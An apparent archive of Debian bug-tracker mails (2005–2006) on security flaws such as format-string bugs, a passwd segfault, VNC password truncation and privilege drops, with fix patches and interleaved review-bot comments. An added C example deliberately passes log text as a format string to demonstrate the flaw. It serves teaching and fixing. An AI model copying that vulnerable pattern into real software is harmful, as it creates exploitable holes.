 go to keyword:$clipboard, which happens to be an alias for google I'm 
 feeling
 lucky search.

  This can be disabled.  Open about:config in your address bar, and
 enter middle in the filter window.  Click show all and you can
 disable various middle-click options.

Steve
-- 





Bug#374181: leaks potentially sensitive information (e.g. passwords) to www.google.com

2006-06-17 Thread Steve Kemp
On Sat, Jun 17, 2006 at 10:30:40PM +0200, Robert Millan wrote:

 Thanks, it seems disabling middlemouse.contentLoadURL gets rid of the
 problem.  Could you make this the default?

  I think that is up to either 

a) Firefox upstream

b) The Debian firefox maintainers

  It certainly isn't the responsibility of the Security Team, so I'm
 not going to argue for or against.

Steve
-- 




Bug#365533: [Secure-testing-team] Re: Bug#365533: CVE-2006-1896: Admin command execution

2006-05-30 Thread Steve Kemp
On Tue, May 30, 2006 at 07:14:11PM +0200, Jeroen van Wolffelaar wrote:
 On Tue, May 30, 2006 at 09:55:16AM +0200, Thijs Kinkhorst wrote:
  On Sun, 2006-05-28 at 22:11 +0100, Steve Kemp wrote:
 Uploaded.
  
  Thanks! But... can't find the upload anywhere? Maybe something went
  wrong or am I looking the wrong way?
 
 I got a 'upload removed due to not being signed by gnupg/gpg' mail. So,
 it looks like something went wrong. 

  Strange.  I don't remember noticing an upload error, or a signing
 error.

  I've resigned + reuploaded for you.  If it works great, if not
 I guess test that network access ;)

Steve
-- 





Bug#365533: [Secure-testing-team] Re: Bug#365533: CVE-2006-1896: Admin command execution

2006-05-28 Thread Steve Kemp
On Sun, May 28, 2006 at 11:02:18PM +0200, Thijs Kinkhorst wrote:
 On Tue, 2006-05-23 at 12:36 +0200, Thijs Kinkhorst wrote:
  Problem is that Jeroen announced that he's on a trip through Mexico
  now,
  so I'm left without someone to upload. Maybe the (testing) security
  team
  or any other DD interested in getting this bug fixed, can take a look
  and upload?
  
  Please find the updated packages here:
  http://www.a-eskwadraat.nl/~kink/phpbb/
 
 Still looking for an uploader here... thanks.

  Uploaded.

Steve
-- 

 
 
 Thijs





-- 
Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit





Bug#360657: passwd SIGSEGV on empty password

2006-04-03 Thread Steve Kemp
On Mon, Apr 03, 2006 at 10:59:32PM +0200, Matteo Croce wrote:
 Package: passwd
 Version: 1:4.0.14-9
 Severity: critical
 Tags: security
 Justification: root security hole
 
 Just press ^D instead of the new password and passwd will segfault.
 I think that this is grave because it's set uid root.

  Interestingly this only happens upon my Sid machine.

  Upon Sarge it works as expected:

[EMAIL PROTECTED]:~$ passwd
Changing password for skx
(current) UNIX password: 
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied
passwd: Authentication token manipulation error


  On unstable it behaves as you describe:

[EMAIL PROTECTED]:~$ passwd
Changing password for skx
(current) UNIX password: 
Enter new UNIX password: 
Retype new UNIX password: 
Segmentation fault

  Under gdb I see this:

Retype new UNIX password: 

Program received signal SIGSEGV, Segmentation fault.
0xb7d815eb in pam_sm_chauthtok () from /lib/security/pam_unix.so

(gdb) bt
#0  0xb7d815eb in pam_sm_chauthtok () from /lib/security/pam_unix.so
#1  0xb7fa9a9a in _pam_dispatch () from /lib/libpam.so.0
#2  0xb7fabfa3 in pam_chauthtok () from /lib/libpam.so.0
#3  0x0804b1df in ?? ()
#4  0x08052388 in ?? ()
#5  0x in ?? ()


  Unfortunately I don't have time tonight to investigate, but it
 looks like it is a pam_unix.so / libpam.so bug, rather than a
 passwd bug.

Steve
-- 





Bug#350964: CVE-2006-0225, scponly shell command possible

2006-02-15 Thread Steve Kemp
On Wed, Feb 15, 2006 at 02:01:51PM +1100, Geoff Crompton wrote:

 This bug has been closed for unstable (see bug 350964) with the 4.6
 upload, but will it be fixed for sarge?

  Please see DSA-969-1 released two days ago:

http://www.us.debian.org/security/2006/dsa-969

  Sarge is fixed.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/






Bug#349555: komi - FTBFS: cannot find -lgp

2006-01-25 Thread Steve Kemp
On Wed, Jan 25, 2006 at 12:29:32PM +0100, Thierry Reding wrote:
 * Bastian Blank wrote:

  Package: komi
  Version: 1.03-4
  Severity: serious
  
  There was an error while trying to autobuild your package:
  

 I've investigated this a bit, and it looks like the upstream Makefile links
 statically against SDL. I've tried rebuilding with dynamic linking and it
 solves the FTBFS.
 
 Any reason why komi would link statically against SDL? Steve? If not, maybe
 the attached patch should be applied.

  I see nothing wrong with this patch.  (Although I'm wondering why
 this build failure didn't manifest itself previously..?)

  If you wish to upload a fixed package feel free.  Otherwise I'll
 do it tomorrow evening.

Steve
-- 





Bug#349283: tor: Tor security advisory: hidden services can be located quickly

2006-01-22 Thread Steve Kemp
On Sat, Jan 21, 2006 at 07:17:36PM -0500, Chris Howie wrote:
 Package: tor
 Version: 0.1.0.16-1
 Severity: grave
 Tags: security
 Justification: user security hole

  Tor isn't included in a Debian stable release, so no need for
 a DSA.

Steve
--





Bug#346101: Strace log not being accepted

2006-01-11 Thread Steve Kemp
On Wed, Jan 11, 2006 at 03:46:19PM -0600, Bonilla, Alejandro wrote:
 I have sent the strace of apachetop and the bug system is not letting it
 in, maybe as an spam check?
 
 Here goes again attached.

  Cheers, got it.

  Looks like I tracked down the bug without this.  See :

http://lists.debian.org/debian-devel/2006/01/msg00648.html

  The problem appears to be that a structure is allocated and not
 initialized to NULL, so an invalid free appears.

  The fix is in the message linked to above - and I'll upload a 
 new revision shortly.

Steve
--





Bug#347221: smstools: Format string attack in logging code

2006-01-09 Thread Steve Kemp

Package: smstools
Version: 1.16-1+b1
Severity: grave
Justification: user security hole
Tags: security

*** Please type your report below this line ***

  A DSA has just been released for smstools due to an insecure
 usage of syslog in the logging code.

  The following patch will correct the issue:

--- smstools-1.14.8.orig/src/logging.c
+++ smstools-1.14.8/src/logging.c
@@ -78,7 +78,7 @@
   va_end(argp);
   if (Filehandle0)
   {
-syslog(severity,text);
+syslog(severity,%s,text);
   }
   else
   {
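Review bot: Passing `text` as the argument to a fixed `%s` format is the right fix, since `text` is already fully formatted by the time `va_end(argp)` runs at the top of the hunk, and anything that came in over the wire must not be allowed to act as a format. The `else` branch that opens on the last two lines of the hunk writes the same `text` on the file-logging path; check that it also hands `text` over as data (a `%s` argument or `fputs`) rather than as the format argument, otherwise the same class of bug remains there.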


Steve
--

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12.6-xen
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)

Versions of packages smstools depends on:
ii  libc6 2.3.5-11   GNU C Library: Shared libraries an
ii  libmm14   1.4.0-1Shared memory library - runtime

smstools recommends no packages.

-- no debconf information





Bug#344398: CVE-2005-4470: Integer overhead in header parser for .blend import

2005-12-23 Thread Steve Kemp
On Fri, Dec 23, 2005 at 12:10:00AM +0100, Florian Ernst wrote:

 Steve, btw, any news on CVE-2005-3302 aka bug#330895 (arbitrary code
 execution when importing a .bvh file)? Last I heard you were going to
 prepare an update unless anybody had an issue with the changes made,
 yet I haven't heard of any such issues (or anything at all, to be
 precise) since then...

  Utterly slipped my mind.  :(

 FWIW, I've put together an update for Sarge's version of the blender
 package based on the upstream change mentioned above, please find
 attached a cumulative interdiff for both CVE-2005-3302 aka bug#330895
 and this bug so these issues can be resolved for Sarge.

  Great, thanks a lot.

 Please tell whether you deem those patches sufficient for a potential
 future security advisory, and if not, please provide pointers at what
 might be missing.

  It looks good to me.  I've built a package and if nobody has any 
 objections I'll upload later today.

Steve
--





Bug#344398: CVE-2005-4470: Integer overhead in header parser for .blend import

2005-12-23 Thread Steve Kemp
On Fri, Dec 23, 2005 at 05:56:59PM +0100, Wouter van Heyst wrote:

It looks good to me.  I've built a package and if nobody has any 
   objections I'll upload later today.
 
 No objections from me.

  Great I already uploaded the package ;)

Steve
--





Bug#340284: mozilla-firefox: su root -c firefox gives root access to any other firefox loaded.

2005-11-22 Thread Steve Kemp
On Tue, Nov 22, 2005 at 12:36:46PM +0100, S. Thommerel wrote:

 To reproduce this bug:
 
  su root and then load firefox from the term. Then launch firefox from
  another unrelated and normal user terminal. The newly launched firefox reads 
 root's
  profile and gets root's rights.

  Isn't this expected behaviour from Firefox?  When invoking new copies
 it doesn't spawn an independent new instance, instead it connects to
 the already-running instance?

  I guess it's a security hole in a sense...

Steve
--





Bug#340079: insecure tempfiles

2005-11-20 Thread Steve Kemp
On Sun, Nov 20, 2005 at 08:17:17PM +0100, Uwe Zeisberger wrote:

 Tags: security patch

 With the attached patch applied, it uses mktemp for their creation.

  The patch is .. missing.

Steve
-- 






Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code

2005-11-16 Thread Steve Kemp
On Wed, Nov 16, 2005 at 02:05:11PM +0100, Loic Minier wrote:
  Security team, did you start work on CVE-2005-3186 and CVE-2005-2975,
  CVE-2005-2976 (not described in this report)?  Ubuntu has released some
  packages which might help http://www.ubuntu.com/usn/usn-216-1.

  Do you need the Gtk maintainers to prepare an upload for stable?

  That would certainly be appreciated.

Steve
--





Bug#338312: osh: Environment Variable Input Validation Bug

2005-11-09 Thread Steve Kemp
On Wed, Nov 09, 2005 at 04:42:08AM -0800, Charles Stevenson wrote:

 Due to a bug in the environment variable substitution code it is
 possible to inject environment variables such as LD_PRELOAD and gain a
 root shell.

  Confirmed.

  Joey we'll need an ID for it.
  
  I guess we need to use two buffers to handle the expansion correctly...

Steve
--



Bug#328129: PATCH: The following patch fixes this issue

2005-11-03 Thread Steve Kemp

  The following patch extracted from the SF.net discussion linked
 above fixes the issue for me.

Steve
--

--- xine-ui-0.99.3.orig/src/xitk/menus.c
+++ xine-ui-0.99.3/src/xitk/menus.c
@@ -425,8 +425,7 @@
   int  x, y;
   xitk_menu_widget_t   menu;
   char buffer[2048];
-  char*sh[255];
-  int  shc = 0;
+  int  i;
   xitk_widget_t   *w;
 #ifdef HAVE_XINERAMA
   int  fullscr_mode = (FULLSCR_MODE | FULLSCR_XI_MODE);
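Review bot: With `char *sh[255]` and `shc` removed, the `menu_get_shortcut()` results that the later hunks now place inline in the menu table are no longer collected anywhere; if that function returns allocated strings, the array was presumably what let the rest of this function free them afterwards, so the part of the function not shown here needs checking for a matching free loop that this patch would leave referencing a removed variable, or confirmation that the menu widget takes ownership of the strings. The replacement `int  i;` is not referenced in any of the visible hunks and will draw an unused-variable warning unless a later, unshown part of the function uses it.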
@@ -439,15 +438,15 @@
   title,  
   NULL, NULL   
  },
 { _(Show controls),
-  (sh[shc++] = menu_get_shortcut(ToggleVisibility)),
+  menu_get_shortcut(ToggleVisibility),
   panel_is_visible() ? checked : check,  
   menu_panel_visibility, NULL  
  },
 { _(Show video window),
-  (sh[shc++] = menu_get_shortcut(ToggleWindowVisibility)),
+  menu_get_shortcut(ToggleWindowVisibility),
   video_window_is_visible() ? checked : check,  
   menu_video_ctrl, (void *) VIDEO_TOGGLE   
  },
 { _(Fullscreen),
-  (sh[shc++] = menu_get_shortcut(ToggleFullscreen)),
+  menu_get_shortcut(ToggleFullscreen),
   (video_window_get_fullscreen_mode()  fullscr_mode) ? checked : 
check,
   menu_video_ctrl, (void *) VIDEO_FULLSCR  
  },
 { SEP,  
@@ -459,7 +458,7 @@
   branch,   
   NULL, NULL   
  },
 { _(Open/File...),
-  (sh[shc++] = menu_get_shortcut(FileSelector)),
+  menu_get_shortcut(FileSelector),
   NULL,
   menu_file_selector,NULL  
  },
 { _(Open/Playlist...),
@@ -467,7 +466,7 @@
   NULL,
   menu_playlist_ctrl, (void *) PLAYL_LOAD  
  },
 { _(Open/Location...),
-  (sh[shc++] = menu_get_shortcut(MrlBrowser)),
+  menu_get_shortcut(MrlBrowser),
   NULL,
   menu_mrl_browser, NULL   
  },
 { _(Playback),
@@ -475,15 +474,15 @@
   Branch,
   NULL, NULL   
  },
 { _(Playback/Play),
-  (sh[shc++] = menu_get_shortcut(Play)),
+  menu_get_shortcut(Play),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_PLAY  
  },
 { _(Playback/Stop),
-  (sh[shc++] = menu_get_shortcut(Stop)),
+  menu_get_shortcut(Stop),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_STOP  
  },
 { _(Playback/Pause),
-  (sh[shc++] = menu_get_shortcut(Pause)),
+  menu_get_shortcut(Pause),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_PAUSE 
  },
 { _(Playback/SEP),
@@ -491,11 +490,11 @@
   separator,  
   NULL,  NULL  
  },
 { _(Playback/Next MRL),
-  (sh[shc++] = menu_get_shortcut(NextMrl)),
+  menu_get_shortcut(NextMrl),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_NEXT  
  },
 { _(Playback/Previous MRL),
-  (sh[shc++] = menu_get_shortcut(PriorMrl)),
+  menu_get_shortcut(PriorMrl),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_PREV  
  },
 { _(Playback/SEP),
@@ -503,11 +502,11 @@
   separator,  
   NULL,  NULL  
  },
 { _(Playback/Increase Speed),
-  (sh[shc++] = menu_get_shortcut(SpeedFaster)),
+  menu_get_shortcut(SpeedFaster),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_SPEEDM
  },
 { _(Playback/Decrease Speed),
-  (sh[shc++] = menu_get_shortcut(SpeedSlower)),
+  menu_get_shortcut(SpeedSlower),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_SPEEDL
  },
 { _(Playlist),
@@ -523,7 +522,7 @@
   NULL,
   menu_playlist_ctrl, (void *) PLAYL_LOAD  
  },
 { _(Playlist/Editor...),
-  (sh[shc++] = menu_get_shortcut(PlaylistEditor)),
+  menu_get_shortcut(PlaylistEditor),
   NULL,
   menu_playlist_ctrl, (void *) PLAYL_EDIT  
  },
 { _(Playlist/SEP),  
@@ -555,7 +554,7 @@
   (gGui-playlist.loop == PLAYLIST_LOOP_SHUF_PLUS) ? checked : 
check,
   menu_playlist_ctrl, (void *) PLAYL_SHUF_PLUS 
  },
 { _(Playlist/Continue Playback),

Bug#335817: wordpress: SECURITY : Contains an insecure version of class.snoopy

2005-10-25 Thread Steve Kemp
Package: wordpress
Version: 1.5.2-2
Severity: grave
Justification: user security hole


  As described upon the following bugtraq post the class Snoopy which
 is included in wordpress potentially allows arbitrary command execution.

http://seclists.org/lists/fulldisclosure/2005/Oct/0536.html

  The class is contained within the wordpress distribution - although
 I haven't explicitly told them yet, I leave it to you to give them
 a nod.

Steve
--
  

-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-k7
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)





Bug#335439: vncserver: passwords over 8 chars not handled correctly

2005-10-23 Thread Steve Kemp
On Sun, Oct 23, 2005 at 08:19:35PM -0400, Collin E Borrlewyn wrote:

 vncserver lets me in without supplying the full password.
 
 To reproduce this:
 start vncserver: vncserver :1
 when prompted enter a password of eight or more characters
 start xvncviewer and connect to :1
 when prompted enter the first eight characters of the password and hit enter
 You have been authenticated.

  This appears to be a known weakness in VNC, for which I can find
 references going back to 1999.

  e.g.

http://www.realvnc.com/pipermail/vnc-list/1999-November/010853.html


  The source documents this:

vnc-3.3.7/vncpasswd/vncpasswd.c

  Always ignore anything after 8 characters, since this is what Solaris 
getpass() does anyway..


  As does man vncpasswd:

  The password must be at least six characters long, and only the first eight
characters are significant

  Perhaps a more prominent warning is required, but I consider it unlikely
 that this will be fixed if upstream is content with the current state

Steve
--





Bug#333682: security problem within CDDB communication

2005-10-13 Thread Steve Kemp
On Thu, Oct 13, 2005 at 10:52:28AM +0200, Michal Čihař wrote:

 xine announcement [1] is four day old, it says issue has been found by
 Debian Security Audit Project, so I'd expect that Debian will have it
 fixed also :-).

  We do.

 Sorry if you're already working on this issue and I interrupt you from
 work, but I wanted to make sure you know about this.

  Please see DSA-863, released on the 12th of October:

http://www.us.debian.org/security/2005/dsa-863

Steve
--





Bug#327722: Patch for Gopher bug CAN-2005-2772

2005-09-26 Thread Steve Kemp
On Mon, Sep 26, 2005 at 09:23:16AM -0500, John Goerzen wrote:

Attached are the patches that Joey (Schulze) approved.
 
 Can you (or Joey) comment: did you use a different patch because you
 believe mine to be insecure, or for a different reason?  (That's an
 important question, since as you know, my patch was uploaded to unstable
 and will presumably be in the next stable release.)

  Your patch looks good.

  The reason that I used the one I did was because it was created
 a few weeks ago when there was no other patch publically
 available.  Had I seen yours at the time I would have used it
 instead, rather than going with something different.

  I certainly don't think you need do anything drastic like
 use the one I made in another upload.  Although it was a 
 fair question to ask.

Steve
--





Bug#325769: Format string security hole in anon-proxy

2005-08-30 Thread Steve Kemp

Package: anon-proxy
Version: 00.02.39-7
Severity: serious
Tags: patch, upstream


  The logging code in anon-proxy contains a misuse of the syslog function
 allowing potential remote compromise of the host it is running upon.

  (This depends whether logging is enabled).

  The patch below fixes the issue.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit

--- CAMsg.cpp-orig  2005-08-29 21:17:42.0 +0100
+++ CAMsg.cpp   2005-08-29 21:18:30.0 +0100
@@ -124,7 +124,7 @@
{
case MSG_LOG:
#ifndef _WIN32
-   
syslog(type,oMsg.m_strMsgBuff);
+   
syslog(type,%s,oMsg.m_strMsgBuff);
#endif
break;
case MSG_FILE:
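Review bot: the `+` line as it appears here reads `syslog(type,%s,oMsg.m_strMsgBuff);`, which would not compile; the quotes around the format have evidently been lost in the mail archive, and the intended line is `syslog(type, "%s", oMsg.m_strMsgBuff);`. The `-` line passed `oMsg.m_strMsgBuff` directly as the format argument, so any `%` directive in a logged message was interpreted by syslog(); the literal `"%s"` makes the buffer plain data. Two things to check before applying: that the `-`/`+` markers are rejoined to their code lines (they sit on separate lines here, so the patch will not apply as shown), and that the other output paths in the same switch (`MSG_FILE` is visible as the next case) also pass the buffer through a literal format, since only the `MSG_LOG` branch under `#ifndef _WIN32` is touched.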
[EMAIL PROTECTED]:/tmp/anon-proxy-00.02.39$ 
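For the record on what that one-line change actually does, here is an added illustration in C. It is not anon-proxy's code: it renders a log message into a buffer the two ways the patch contrasts (message as the format string versus message as data under a literal `"%s"`), so the difference can be observed without writing to the system log. The function names and the message text are constructed for the example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from anon-proxy. Shows what the patch changes
 * by rendering a constructed log message the two ways into buffers. */

#define LOG_BUF 256

/* Call snprintf through a pointer so the compiler's format check is
 * bypassed here on purpose: the point of the example is that message
 * text gets interpreted when it is passed as the format. In real code
 * that compiler check is exactly what you want to keep. */
static int (*const fmt_printf)(char *, size_t, const char *, ...) = snprintf;

/* The pattern the patch removes: the message IS the format string, and
 * every '%' sequence in it is interpreted by the formatter. Only "%%" is
 * fed to this function in the example because it consumes no argument;
 * any other directive in a real message would read arguments that were
 * never passed. */
const char *render_as_format(const char *msg)
{
    static char out[LOG_BUF];
    fmt_printf(out, sizeof out, msg);
    return out;
}

/* The pattern the patch introduces: literal format, message as data. */
const char *render_as_data(const char *msg)
{
    static char out[LOG_BUF];
    snprintf(out, sizeof out, "%s", msg);
    return out;
}

/* A wrapper for code you maintain: declaring the printf-style contract
 * lets GCC/Clang warn (-Wformat / -Wformat-security) at any call site
 * that passes a non-literal format, which is how this class of bug is
 * caught before it ships. */
#if defined(__GNUC__)
__attribute__((format(printf, 1, 2)))
#endif
const char *log_checked(const char *fmt, ...)
{
    static char out[LOG_BUF];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, sizeof out, fmt, ap);
    va_end(ap);
    return out;
}

/* 1 when the message comes through unchanged either way, 0 when the
 * formatter altered it, i.e. it contained something syslog() would have
 * interpreted had it been passed as the format. */
int message_survives_intact(const char *msg)
{
    return strcmp(render_as_format(msg), render_as_data(msg)) == 0;
}
```

A message such as `disk 100%% full` comes out as `disk 100% full` through the first path and unchanged through the second; that divergence is the tell-tale for this bug class in any logging wrapper, and the `format` attribute on `log_checked` is the cheap way to make the compiler find the remaining call sites.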






Bug#325135: maildrop: lockmail doesn't drop privileges

2005-08-28 Thread Steve Kemp
On Sat, Aug 27, 2005 at 07:03:55PM -0400, Andres Salomon wrote:

Certainly.  Once the advisory is out I can make an upload if Joy
   hasn't already made one.
  
 
 I can also do an upload; Joy already said I should comaintain, I've just
 been waiting for racke to do a new courier upload so that I can actually
 use maildrop (I have new maildrop packages in experimental that're just
 rotting away, waiting).

  I'll leave it to you then, unless you tell me differently.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit






Bug#325135: maildrop: lockmail doesn't drop privileges

2005-08-27 Thread Steve Kemp
On Sat, Aug 27, 2005 at 12:27:51PM +0200, Martin Schulze wrote:

 Thanks a lot for the report.  This is CAN-2005-2655.
 
  The bug affects 1.5.3-1.1 sarge/etch/sid and 1.8.1-2 in experimental,
  and should be easy to fix: Just add setgid(getgid()) before the
  execvp(). I tested the attached patch briefly and verified that it
  builds and prevents this bug.
 
 Steve, could you take care of sid and experimental packages if Joy
 is too busy?

  Certainly.  Once the advisory is out I can make an upload if Joy
 hasn't already made one.

Steve
--
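The fix described in the quoted message, `setgid(getgid())` before the `execvp()`, written out as an added C example of the privilege-drop routine one would put in front of any exec in a setgid or setuid helper. This is not maildrop's code; the function names are constructed for the example, and it is safe to call in an unprivileged process, where every step is a no-op that still succeeds.

```c
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Added example, not maildrop's code. The order matters: supplementary
 * groups first (only root can clear them), then the gid, then the uid,
 * because once the uid is dropped the gid can no longer be changed.
 * Each step is verified rather than assumed. */

/* 1 if the process holds a supplementary group other than gid (or the
 * list could not be read, in which case assume there is one). */
static int has_extra_groups(gid_t gid)
{
    gid_t list[64];
    int n = getgroups(64, list);
    if (n < 0)
        return 1;
    for (int i = 0; i < n; i++)
        if (list[i] != gid)
            return 1;
    return 0;
}

/* Returns 0 when the process now runs with its real ids only, -1 with
 * errno set otherwise. */
int drop_privileges(void)
{
    gid_t gid = getgid();
    uid_t uid = getuid();

    /* Supplementary groups are only a privilege worth clearing when we
     * are effectively root; a setgid (non-root) program inherits the
     * invoking user's own groups, which it is entitled to anyway. */
    if (geteuid() == 0 && has_extra_groups(gid) && setgroups(0, NULL) != 0)
        return -1;

    /* The one-liner from the bug report: make the effective gid the
     * real gid before anything else runs. */
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;

    /* Verify: if either effective id still differs from the real one,
     * the drop did not take and exec'ing anything would be unsafe. */
    if (getegid() != gid || geteuid() != uid) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

/* How it sits in front of the exec: fail closed rather than run the
 * child with leftover privilege. argv is the caller's command line. */
int exec_unprivileged(char *const argv[])
{
    if (drop_privileges() != 0) {
        perror("drop_privileges");
        return -1;
    }
    execvp(argv[0], argv);
    perror("execvp");   /* only reached when exec itself fails */
    return -1;
}
```

The check after the `setuid()` is the part most often left out: on some kernels a failed drop is silent unless you re-read the effective ids, and a helper that execs with the saved set-id still in place hands that privilege to whatever it runs.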





Bug#299560: dsniff: fails due to not finding libnids

2005-03-14 Thread Steve Kemp
On Tue, Mar 15, 2005 at 01:36:08AM +0100, txemi wrote:
 Package: dsniff
 Version: 2.4b1-8
 Severity: grave
 
 dsniff fails this way in debian testing after last upgrade:

  Strange it works for me.

 $ sudo dsniff
 dsniff: error while loading shared libraries: libnids.so.1.19: cannot
 open shared object file: No such file or directory

  Please show me the output of :

ls -l `which dsniff`
ls -l /usr/sbin/dsniff

  (The last time this was reported the user had a local copy in
 /usr/local/bin - I'm trying to make sure you're not doing that).

 Perhaps this bug should be forwarded to libnids.

  Keep it here for the moment.

  The problem seems to be that the version of dsniff you have installed 
 is looking for libnids.so.1.19 when it starts - which it shouldn't
 because the package has an explicit dependency upon ...1.20.

  From the dpkg information included it looks like you have the most
 recent version of everything so it should work.


Steve
--





Bug#299560: dsniff: fails due to not finding libnids

2005-03-14 Thread Steve Kemp
On Tue, Mar 15, 2005 at 01:36:08AM +0100, txemi wrote:
 Package: dsniff
 Version: 2.4b1-8

  I spoke too soon.

  libnids 1.20 has made it into testing.  dsniff version 2.4b1-9 has
 not.

  This is not something I can fix, when the most recent version of
 dsniff makes it into testing your problem will be fixed.

  You have three choices:

1. Install an older version of libnids for the moment to allow
  dsniff to work.

2. Build from source yourself.

3. Wait.

Steve
--





Bug#295556: FWD: [SECURITY] [DSA 684-1] New typespeed packages fix arbitrary group games code execution

2005-02-16 Thread Steve Kemp
On Wed, Feb 16, 2005 at 06:53:07PM +, Dafydd Harries wrote:

  Filing this bug to track the security hole in the DSA below. Apparently
  a fix for unstable has not yet been uploaded.
 
 Since I don't have a copy of the original security patch, I tried to
 extract the changes by interdiffing the fixed stable version with the
 latest unstable version. The changes to network.c and typespeed.c apply
 cleanly, but the changes to file.c don't. I'm working on resolving those
 conflicts.
 
 Note, however, that my time and Internet access are limited this week,
 and I won't be back home until next Monday, so it may be best for a fix
 to be NMUd.

  I can make one tomorrow if that would be useful?

Steve
--

